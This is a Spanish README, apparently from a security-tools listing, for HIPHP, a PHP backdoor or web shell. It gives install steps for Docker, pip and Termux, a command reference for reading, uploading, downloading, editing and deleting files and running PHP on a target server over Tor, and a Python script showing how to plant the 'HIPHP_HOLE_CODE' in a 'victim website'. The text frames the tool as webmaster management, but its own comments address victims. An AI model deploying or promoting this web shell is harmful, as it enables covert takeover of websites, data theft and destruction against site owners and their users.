
Herramienta de puerta trasera basada en PHP para control remoto de sitios web a través de HTTP/HTTPS. Permite la gestión de archivos, la ejecución de comandos y la conectividad Tor con acceso protegido por contraseña.
🚨 ¡Nueva versión disponible!
WebHole ahora es compatible con todos los lenguajes web principales.
Échale un vistazo en GitHub: WebHole en GitHub
Proyecto gratuito y de código abierto para crear un backdoor que controle sitios web basados en PHP.
HIPHP BackDoor es una herramienta de código abierto que permite el control remoto de sitios web que utilizan el lenguaje de programación PHP a través del protocolo HTTP/HTTPS. Mediante el método POST/GET en el puerto 80, los usuarios pueden acceder a una variedad de funcionalidades como la descarga y edición de archivos. Además, ofrece la capacidad de conectarse a redes Tor, proporcionando una capa adicional de seguridad mediante el uso de protección por contraseña.
Desarrollado por un equipo de webmasters que deseaban tener un mayor control sobre sus sitios sin depender de software o servicios de terceros, HIPHP es una solución simple y fácil de usar. Al colocar el HIPHP_HOLE_CODE en cualquier archivo PHP dentro de la estructura de directorios del sitio, se otorgan derechos de acceso para realizar cambios desde cualquier lugar del mundo. Esto lo convierte en una solución ideal para propietarios de sitios web que buscan una mayor flexibilidad al gestionar su presencia en línea.
La seguridad es una prioridad máxima para HIPHP, con actualizaciones periódicas que garantizan la compatibilidad con diferentes versiones del código base PHP utilizado por los sistemas de gestión de contenidos (CMS) más populares. Su función de protección por contraseña añade una capa adicional de defensa contra accesos no autorizados. HIPHP es una solución segura para aquellos que desean recuperar el control total sobre su entorno de alojamiento web.
| Distribution | Version Check | Python Version | Installation | hiphp-cli | hiphp-desktop | hiphp-tk |
|---|---|---|---|---|---|---|
| Ubuntu | Última versión | 3.7 --> 3.11 | ✓ | ✓ | ✓ | ✓ |
| Windwos | Última versión | 3.7 --> 3.11 | ✗ | ✓ | ✓ | ✓ |
| MacOS | Última versión | 3.7 --> 3.10 | ✗ | ✓ | ✓ | ✓ |
| Android-termux | Última versión | 3.7 --> 3.9 | ✓ | ✓ | ✗ | ✗ |
| Nethunter | Última versión | 3.7 --> 3.9 | ✓ | ✓ | ✓ | ✗ |
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t hiphp:latest
<p>haga clic para ver <a href="https://asciinema.org/a/QRlMY6JH9uwMCIbaV7F6lLoQ1">Demo</a></p><br>
<br>
<h4>Pull, build y run desde Docker Hub:</h4>```bash
# Pull:
❯ docker pull yasserbdj96/hiphp:latest
# Build:
❯ docker build -t docker.io/yasserbdj96/hiphp:latest .
# Run as CLI:
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as CLI with PROXIES:
❯ docker run -e KEY="<KEY>" -e URL="<URL>" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t docker.io/yasserbdj96/hiphp:latest
# Run as GUI:
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t docker.io/yasserbdj96/hiphp:latest
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
haga clic para ver Demo
❯ docker build -t ghcr.io/yasserbdj96/hiphp:latest .
❯ docker run -e KEY="<KEY*>" -e URL="<URL*>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run -e KEY="" -e URL="" -e PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" -i -t ghcr.io/yasserbdj96/hiphp:latest
❯ docker run --rm -p 127.0.0.1:8080:8080 -e DOCKER=True -e DST=True -i -t ghcr.io/yasserbdj96/hiphp:latest
<p>haga clic para ver <a href="https://asciinema.org/a/wDWAVo5GURsAbCUVseZsN2PdY">Demo</a></p><br>
<br>
<h2>Instalación:</h2>
<h4>Instalación del paquete Python:</h4>```bash
# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp
# Local install:
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .
# Uninstall:
❯ pip uninstall hiphp
❯ cd hiphp
❯ cd install
❯ bash install.sh --install ❯ hiphp
❯ bash install.sh --update
❯ bash install.sh --uninstall
<br>
<h4>Instalación de Termux:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# Go to Installation folder:
❯ cd install
# Install:
❯ bash install.sh --termux --install
❯ hiphp
# Update:
❯ bash install.sh --termux --update
# Usage: hiphp [OPTION]
# Examples:
# hiphp --help # Show CLI help for hiphp.
# hiphp --geth [KEY] [URL] # Retrieve the HIPHP_HOLE_CODE encrypted by your [KEY].
# hiphp [KEY] [URL] # Connect to the victim's website in CLI mode.
# hiphp --version # Check the current version number.
# Uninstall:
❯ bash install.sh --termux --uninstall
❯ cd hiphp
❯ bash build_deb.sh
❯ sudo dpkg -i hiphp-.deb
❯ sudo apt install ./hiphp-.deb
<br>
<h2>Ejecutar sin instalación:</h2>
<h4>Ejecutar con hiphp-cli:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# default run on any os:
❯ python main.py --KEY="<KEY*>" --URL="<URL*>"
# Run with Makefile:
❯ make ARGUMENTS="--KEY='<KEY*>' --URL='<URL*>'" run
# For linux:
❯ cd hiphp-linux
❯ bash hiphp-cli.sh --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-cli.bat --KEY="<KEY*>" --URL="<URL*>" --PROXIES="<FILE_PATH/{'http/https':'IP:port'}>" --Y
--help, help # Display this help. --help [ACTIONS], help [ACTIONS] # Help for a specific command. --geth, geth # Get the HIPHP_HOLE_CODE (same purpose as --geth). --phpinfo, phpinfo # Display information about the server. --cls, cls # Clear the console. --exit, exit # Exit the console.
Actions:
--ls, ls # List files and folders (current directory by default). Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH] --ls # List all files and folders in the current directory. --ls [PATH] # List all files and folders in the specified directory. --ls -all # List all files, folders, and subfolders in the current directory. --ls -all [PATH] # List all files, folders, and subfolders in the specified directory.
--cat, cat # Concatenate a file to standard output. Usage: --cat [FILE_PATH]
--set, set # Create a code snippet that is always saved during work. Usage: --set [PHP_CODE] To reset to the initial value, use "--dset" or "dset".
--cd, cd # Change directory. Usage: --cd [PATH]
--rf, rf, run # Run code from a file. Usage: --rf [FILE_PATH] [VARIABLES] --rf [FILE_PATH] # Run code from a file. --rf [FILE_PATH] [VARIABLES] # Run code from a file with variables (e.g., --rf example.php var==hello).
--up, up, upload # Upload a file. Usage: --up [FILE_PATH] [PATH] --up [FILE_PATH] # Upload a file to the current directory. --up [FILE_PATH] [PATH] # Upload a file to a specified directory.
--down, down, download # Download a file. Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH] --down -f [FILE_PATH] # Download a file to the current directory. --down -f [FILE_PATH] [OUT_PATH] # Download a file to a specified directory. --down -d [DIR_PATH] # Download a folder to the current directory. --down -d [DIR_PATH] [OUT_PATH] # Download a folder to a specified directory. --down -all # Download all files to the current directory. --down -all [OUT_PATH] # Download all files to a specified directory.
--zip, zip # Compress a directory. Usage: --zip [DIR_PATH] --zip # Compress the current directory. --zip [DIR_PATH] # Compress a specific directory.
--edt, edt, edit # Edit files. Usage: --edt [FILE_PATH] CTRL+q # Exit the editor. CTRL+s # Save the changes.
--rm, rm, delete # Delete files and folders. Usage: --rm [-f/-d] [FILE/DIR_PATH] --rm -f [FILE_PATH] # Delete a file. --rm -d [DIR_PATH] # Delete a folder.
--mv, mv # Move files and folders. Usage: --mv [SOURCE] [DESTINATION]
--chmod, chmod # change file/folder permissions Usage: --chmod [PERMISSIONS] [FILE/DIR_PATH]
About:
--update, update # Check for updates. --license, license # View the project license. --about, about # About this project. --version, version # Get the current version number.
<br>
<h4>Ejecutar con hiphp-desktop:</h4>```bash
# Download hiphp from github:
❯ git clone https://github.com/yasserbdj96/hiphp.git
# OR
# Download hiphp from gitlab:
❯ git clone https://gitlab.com/yasserbdj96/hiphp.git
# Go to downloaded folder:
❯ cd hiphp
# install requirements:
❯ pip install -r requirements.txt
❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os.
❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
# run with hiphp-desktop tool:
❯ python main.py --DST
# Run with Makefile:
❯ make ARGUMENTS="--DST" run
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Linux:
❯ cd hiphp-linux
❯ bash hiphp-desktop.sh
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
# For Windows:
# Do not forget to modify the "config.ini" file or use the following command:
# > python -c "import sys; open('config.ini','w+').write('python_default_path='+sys.executable)"
# OR Run 'hiphp-win\config-configure.py'.
❯ cd hiphp-win
❯ hiphp-desktop.bat
# Open your web browser and navigate to http://127.0.0.1:8080 to see the default landing page.
❯ cd hiphp
❯ pip install -r requirements.txt ❯ pip install -r hiphp-linux/requirements-linux.txt #for linux os. ❯ pip install -r hiphp-win/requirements-win.txt #for windows os.
❯ python main.py --TK
❯ make ARGUMENTS="--TK" run
❯ make ARGUMENTS="--TK --KEY='' --URL=''" run
❯ cd hiphp-linux ❯ bash run-hiphp-tk.sh
❯ hiphp-win ❯ run-hiphp-tk.bat
<br>
<h2>Usar hiphp como script:</h2>
<h4>Uso del script:</h4>```python
# install hiphp package:
# ❯ pip install hiphp
# import hiphp package:
from hiphp import *
# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
# PROXIES = To use a proxy.
# RETURN = True for return data as a string, false for print data in the console.
p1=hiphp(key="123",url="http://127.0.0.1/index.php")#Default: retu=False, proxies="". #p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser. #p1=hiphp(key="123",url="https://localhost.com/vvv2.php")
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php
p1.run("echo 'this is a test';")
p1.run_file("./examples.php")# Run code from file. p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.
p1.upload("./examples.php")# Upload a file to the current directory. p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.
p1.compress()# Compress the current directory. p1.compress("./example/")# Compress a specific directory.
p1.download("example.zip")# download a specific file to the current directory. p1.download("example.zip","<OUT_PATH>")# download a specific file to specific directory.
p1.cli() #}END.
<br>
<h2>Capturas de pantalla:</h2>
<div align="center">
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/26eba0a21247c621a1e22d366ed56aef53e66026deb91c0401f2f0600f5e467c.png" alt="Vista previa social de hiphp">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot0.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f7e873693e43b2997d506931b6263fc03ddb839b685f75510f8c3319eed26136.png" alt="hiphp-cli en linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot1.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/ab8f73643879f0c6257da8f96f75d162525fec87a1d27a757ff1cd92c9f60676.png" alt="ayuda de hiphp-cli">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot2.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fcb6cc1affa5fd690891af13697e6354a39292accbb4e9f09c5591e4baec4985.png" alt="hiphp-cli instalado en linux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot3.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/bf9b7f1ec5f8bc9fa33c59b864fed6f497d5b624844aa16f76c4e43af8019ce1.png" alt="hiphp-cli instalado en termux">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot4.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f0e8c087e50616ce47f188195b285d731af64dd79e7da5387bec0077f9346a8f.png" alt="hiphp-cli en windows">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot14.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/7730738d9028ad2f3c3367bc38b57085946236635df5343308754a86e47b1b31.png" alt="hiphp-cli escaneando">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot5.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/44302c3ddc91b76b81e330a05cd87f3271ad2327d63eca6c46bf2eb84759b826.png" alt="inicio de sesión de hhiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot6.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/e1a1fb6fa6fd04f49c2ef656d42540e9c633e820e9292dcdeb9154dfbdb7bcfa.png" alt="hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot7.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/c63d4a141ab36bab58a529216ea78828691535c3581c39ed30ffb77ecd51aca6.png" alt="editor de hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot8.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/5883c9001d4cbdcd2dd0df082a4d8cc81fd766456efd548459fc598541222d2c.png" alt="inicio de sesión de hiphp-desktop modo oscuro">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot9.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/6f1a39895da6033d29e160360c31b1275997c0f180df371b61507bff3ae12dc9.png" alt="hiphp-desktop modo oscuro">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot10.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f578c99a0f94623e73e24f5e15a502bc1a5fd0ebab925fc5f0c9b39a499d28d3.png" alt="editor de hiphp-desktop modo oscuro">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot11.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/29de8b71c3eb0e494749275cc9b641ee411b8c54f20dd71cba165ae587c301b7.png" alt="configuración de hiphp-desktop">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot12.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/cfefaeec60064d87318f897e145b6ba6017de9ef11b558c13b1a3cdc92e995ba.png" alt="inicio de sesión de hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot13.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/fe863889f956edac2ba2f30f0e366a29b0ae8d0f6320548093b40a2cd9690180.png" alt="hiphp-tk">
</a>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/screenshot/screenshot15.png">
<img height="100" src="https://assets.kitploit.com/production/public/readmes/6125/f75a974cfebdfe6d62a01f72e295061a01c8b296d120be9ce145d07fff01c284.png" alt="hiphp después de instalar en linux">
</a>
</div>
<br>
<h2>Historial de cambios:</h2>
<a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/CHANGELOG">Haga clic para ver el historial de cambios</a>
<br>
<h2>Limitaciones:</h2>
1. Cuando use hiphp por primera vez en un sitio, el código HIPHP_HOLE_CODE se le mostrará, cópielo y súbalo a la ruta a la que desea conectarse, por ejemplo 'https://localhost/inc/example.php'.<br>
2. Para que hiphp funcione correctamente y sin errores, HIPHP_HOLE_CODE debe colocarse al inicio del archivo de destino.<br>
3. hiphp no funcionará y le mostrará un mensaje indicando que no puede conectarse al sitio si no ingresa la ruta correcta a la ubicación de HIPHP_HOLE_CODE a través del enlace.<br>
4. Si usa hiphp en sitios .onion, debe ejecutar servicios tor o el navegador tor.<br>
5. Si es usuario de Windows, debe modificar el archivo "config.ini".<br>
6. NO SOY RESPONSABLE DE CÓMO USE MIS HERRAMIENTAS/PROGRAMAS/PROYECTOS. SEA LEGAL Y NO ESTÚPIDO.
<br>
<h2>Desarrollado por:</h2>
Desarrollador / Autor: [yasserbdj96](https://github.com/yasserbdj96)
<br>
<h2>Licencia:</h2>
<p>El contenido de este repositorio está sujeto a la siguiente <a href="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/LICENSE">LICENCIA</a>.</p>
<br>
<h2>Soporte:</h2>
<p>Si disfruta de este proyecto y le gustaría verlo seguir mejorando, o si desea que cree proyectos más interesantes, considere <a href="https://github.com/sponsors/yasserbdj96">patrocinarme</a>.</p>
<br>
<br>
<p align="center">
<samp>
<a href="https://yasserbdj96.github.io/">sitio web</a> .
<a href="https://github.com/yasserbdj96">github</a> .
<a href="https://gitlab.com/yasserbdj96">gitlab</a> .
<a href="https://www.linkedin.com/in/yasserbdj96">linkedin</a> .
<a href="https://twitter.com/yasserbdj96">twitter</a> .
<a href="https://instagram.com/yasserbdj96">instagram</a> .
<a href="https://www.facebook.com/yasserbdj96">facebook</a> .
<a href="https://www.youtube.com/@yasserbdj96">youtube</a> .
<a href="https://pypi.org/user/yasserbdj96">pypi</a> .
<a href="https://hub.docker.com/u/yasserbdj96">docker</a> .
<a href="https://t.me/yasserbdj96">telegram</a> .
<a href="https://gitter.im/yasserbdj96/yasserbdj96">gitter</a> .
<a href="mailto:[email protected]">correo electrónico</a> .
<a href="https://github.com/sponsors/yasserbdj96">patrocinador</a>
</samp>
</p>